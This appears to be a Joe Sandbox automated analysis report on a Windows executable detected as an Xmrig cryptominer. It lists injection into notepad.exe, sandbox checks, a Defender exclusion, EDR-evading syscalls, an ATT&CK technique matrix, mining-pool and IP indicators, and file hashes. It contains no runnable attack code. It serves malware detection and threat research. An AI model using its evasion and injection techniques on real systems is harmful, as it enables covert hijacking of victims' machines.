            Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\conhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\notepad.exeCode function: 5_2_000000014031010C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_000000014031010C
            Source: C:\Windows\System32\notepad.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: notepad.exe, 00000005.00000002.2940501021.0000029C16C9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Windows Management Instrumentation
            1
            Windows Service
            1
            Windows Service
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote ServicesData from Local System2
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts12
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            611
            Process Injection
            1
            Disable or Modify Tools
            LSASS Memory211
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media1
            Non-Application Layer Protocol
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            Abuse Elevation Control Mechanism
            121
            Virtualization/Sandbox Evasion
            Security Account Manager1
            Process Discovery
            SMB/Windows Admin SharesData from Network Shared Drive2
            Application Layer Protocol
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
            DLL Side-Loading
            611
            Process Injection
            NTDS121
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Abuse Elevation Control Mechanism
            LSA Secrets1
            Application Window Discovery
            SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading
            Cached Domain Credentials14
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1589435 Sample: 9d2h99wrj.exe Startdate: 12/01/2025 Architecture: WINDOWS Score: 100 35 pool.hashvault.pro 2->35 45 Sigma detected: Xmrig 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 Antivirus / Scanner detection for submitted sample 2->49 51 6 other signatures 2->51 9 9d2h99wrj.exe 2->9         started        signatures3 process4 signatures5 55 Writes to foreign memory regions 9->55 57 Allocates memory in foreign processes 9->57 59 Creates a thread in another existing process (thread injection) 9->59 61 Found direct / indirect Syscall (likely to bypass EDR) 9->61 12 conhost.exe 5 9->12         started        process6 file7 29 C:\Users\user\AppData\Roaming\...\WR64.sys, PE32+ 12->29 dropped 63 Found strings related to Crypto-Mining 12->63 65 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 12->65 67 Writes to foreign memory regions 12->67 69 4 other signatures 12->69 16 notepad.exe 12->16         started        20 cmd.exe 1 12->20         started        signatures8 process9 dnsIp10 31 80.240.16.67, 443, 49730, 49733 AS-CHOOPAUS Germany 16->31 33 pool.hashvault.pro 192.248.189.11, 443, 49731, 49741 AS-CHOOPAUS France 16->33 37 System process connects to network (likely due to code injection or exploit) 16->37 39 Query firmware table information (likely to detect VMs) 16->39 41 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->41 43 Adds a directory exclusion to Windows Defender 20->43 22 powershell.exe 23 20->22         started        25 powershell.exe 23 20->25         started        27 conhost.exe 20->27         started        signatures11 process12 signatures13 53 Loading BitLocker PowerShell Module 22->53

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            9d2h99wrj.exe60%VirustotalBrowse
            9d2h99wrj.exe61%ReversingLabsWin64.Trojan.Donut
            9d2h99wrj.exe100%AviraHEUR/AGEN.1344832
            9d2h99wrj.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys5%ReversingLabs
            C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys4%VirustotalBrowse
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches

            Download Network PCAP: filteredfull

            NameIPActiveMaliciousAntivirus DetectionReputation
            pool.hashvault.pro
            192.248.189.11
            truefalse
              high
              NameSourceMaliciousAntivirus DetectionReputation
              https://xmrig.com/benchmark/%sconhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                high
                https://xmrig.com/wizardconhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                  high
                  https://xmrig.com/wizard%sconhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                    high
                    https://xmrig.com/docs/algorithmsconhost.exe, 00000001.00000003.1727491155.00000211D0BCD000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1724397505.00000211D0BCF000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1722733645.00000211D0BCA000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1718862129.00000211D0BC2000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1719595132.00000211D0BC6000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1723937432.00000211D0BC7000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1729241507.00000211D0BC0000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1717134886.00000211D0BCC000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1726405894.00000211D0BCE000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000001.00000003.1734910093.00000211D0BC5000.00000004.00000020.00020000.00000000.sdmp, notepad.exe, 00000005.00000002.2939901627.0000000140000000.00000040.00000400.00020000.00000000.sdmpfalse
                      high
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      80.240.16.67
                      unknownGermany
                      20473AS-CHOOPAUStrue
                      192.248.189.11
                      pool.hashvault.proFrance
                      20473AS-CHOOPAUSfalse
                      Joe Sandbox version:42.0.0 Malachite
                      Analysis ID:1589435
                      Start date and time:2025-01-12 14:18:09 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 7s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:9d2h99wrj.exe
                      Detection:MAL
                      Classification:mal100.evad.mine.winEXE@12/11@2/2
                      EGA Information:
                      • Successful, ratio: 50%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                      • Excluded IPs from analysis (whitelisted): 4.245.163.56, 13.107.246.45
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target notepad.exe, PID 7112 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size getting too big, too many NtCreateKey calls found.
                      TimeTypeDescription
                      08:19:02API Interceptor1x Sleep call for process: 9d2h99wrj.exe modified
                      08:19:05API Interceptor33x Sleep call for process: powershell.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      80.240.16.67Solara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                        xmr new.exeGet hashmaliciousXmrigBrowse
                          192.248.189.11file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                            eth.exeGet hashmaliciousXmrigBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              pool.hashvault.proSolara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                              • 192.248.189.11
                              xmr new.exeGet hashmaliciousXmrigBrowse
                              • 80.240.16.67
                              eth.exeGet hashmaliciousXmrigBrowse
                              • 192.248.189.11
                              ZppxPm0ASs.exeGet hashmaliciousXmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Vidar, XmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                              • 37.203.243.102
                              file.exeGet hashmaliciousXmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                              • 5.188.137.200
                              file.exeGet hashmaliciousXmrigBrowse
                              • 37.203.243.102
                              file.exeGet hashmaliciousDarkVision Rat, XmrigBrowse
                              • 37.203.243.102
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              AS-CHOOPAUSSolara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                              • 80.240.16.67
                              80P.exeGet hashmaliciousI2PRATBrowse
                              • 207.246.88.73
                              4.elfGet hashmaliciousUnknownBrowse
                              • 44.40.164.148
                              zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                              • 78.141.202.204
                              Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                              • 44.40.164.150
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                              • 192.248.189.11
                              miori.x86.elfGet hashmaliciousUnknownBrowse
                              • 44.175.18.157
                              xmr new.exeGet hashmaliciousXmrigBrowse
                              • 80.240.16.67
                              eth.exeGet hashmaliciousXmrigBrowse
                              • 192.248.189.11
                              cZO.exeGet hashmaliciousUnknownBrowse
                              • 108.61.189.74
                              AS-CHOOPAUSSolara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                              • 80.240.16.67
                              80P.exeGet hashmaliciousI2PRATBrowse
                              • 207.246.88.73
                              4.elfGet hashmaliciousUnknownBrowse
                              • 44.40.164.148
                              zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                              • 78.141.202.204
                              Fantazy.mpsl.elfGet hashmaliciousUnknownBrowse
                              • 44.40.164.150
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                              • 192.248.189.11
                              miori.x86.elfGet hashmaliciousUnknownBrowse
                              • 44.175.18.157
                              xmr new.exeGet hashmaliciousXmrigBrowse
                              • 80.240.16.67
                              eth.exeGet hashmaliciousXmrigBrowse
                              • 192.248.189.11
                              cZO.exeGet hashmaliciousUnknownBrowse
                              • 108.61.189.74
                              No context
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sysSolara.exeGet hashmaliciousPython Stealer, Exela Stealer, XmrigBrowse
                                launcher.exe.bin.exeGet hashmaliciousPureLog Stealer, Xmrig, zgRATBrowse
                                  nW2oopMIdg.exeGet hashmaliciousXmrigBrowse
                                    gem2.exeGet hashmaliciousXmrigBrowse
                                      chrtrome22.exeGet hashmaliciousXmrigBrowse
                                        pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                          174.exeGet hashmaliciousXmrigBrowse
                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                              47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                xmr new.exeGet hashmaliciousXmrigBrowse
                                                  Process:C:\Windows\System32\conhost.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1267
                                                  Entropy (8bit):5.355115896011818
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KQMsXE4Np/E4K9E4KnKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQrHNp/HK9HKnYHKGSI6oPtHTHhA2
                                                  MD5:5B8589D00296CA4291880EAC82B43B1D
                                                  SHA1:6C11FD4FCD6B9B3762F048BBF45EE0516BF668B3
                                                  SHA-256:F207A0EAD4836653A8CCA1C28C08BB0772EAB1743E7E8136064C31CC3883DD99
                                                  SHA-512:A938DDC717A9EF0FCBC4C69813CA409F0E67FF996854A61ED0C2D41FFD06386936A564669C6D50921A2088FC814CE94CA74AF91F0644E5678852BF50E9280BF8
                                                  Malicious:false
                                                  Reputation:low
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da690062882e06694f1\System.Management.ni.dll",0..2,"System.IO.Compression, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..2,"System.IO.Compression.FileSystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configur
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):64
                                                  Entropy (8bit):0.34726597513537405
                                                  Encrypted:false
                                                  SSDEEP:3:Nlll:Nll
                                                  MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                  SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                  SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                  SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                  Malicious:false
                                                  Reputation:high, very likely benign file
                                                  Preview:@...e...........................................................
                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  File Type:ASCII text, with no line terminators
                                                  Category:dropped
                                                  Size (bytes):60
                                                  Entropy (8bit):4.038920595031593
                                                  Encrypted:false
                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                  Malicious:false
